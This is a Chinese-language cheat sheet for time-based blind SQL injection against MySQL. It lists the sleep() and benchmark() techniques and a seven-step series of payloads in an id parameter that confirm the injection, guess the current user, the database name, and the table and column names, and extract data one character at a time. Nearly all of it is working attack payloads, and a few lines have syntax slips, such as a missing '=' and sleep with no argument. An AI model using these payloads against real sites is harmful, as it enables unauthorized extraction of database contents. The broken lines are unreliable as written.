延时盲注

延时注入

• mysql>=5.0 使用sleep()进行查询
• mysql<5.0使用benchmark()进行查询

---

注入流程

1.判断是否存在延迟注入

• id=1' and sleep(5)#

---

2.判断当前用户

• id=1' and if(ascii(substr(user(),1,1))=114,sleep(5),1)#

---

3.判断数据库名长度

• id=1' and if(length(database())=8,sleep(5),1)#

---

4.猜解数据库名称

• id=1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)#

---

5.猜解表名

• id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database limit 0,1),1,1))=116,sleep(5),1)#
  id=1' and if(ascii(substr((select distinct concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))=116,sleep(5),1)#distinct 不显示重复值

---

6.猜解列名

• id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name'数据表名' limit 0,1),1,1))>100,sleep,1)#

---

7.数据

• id=1' and if(ascii(substr((select 列名 from 表 limit 0,1),1,1))>100,sleep(5),1)#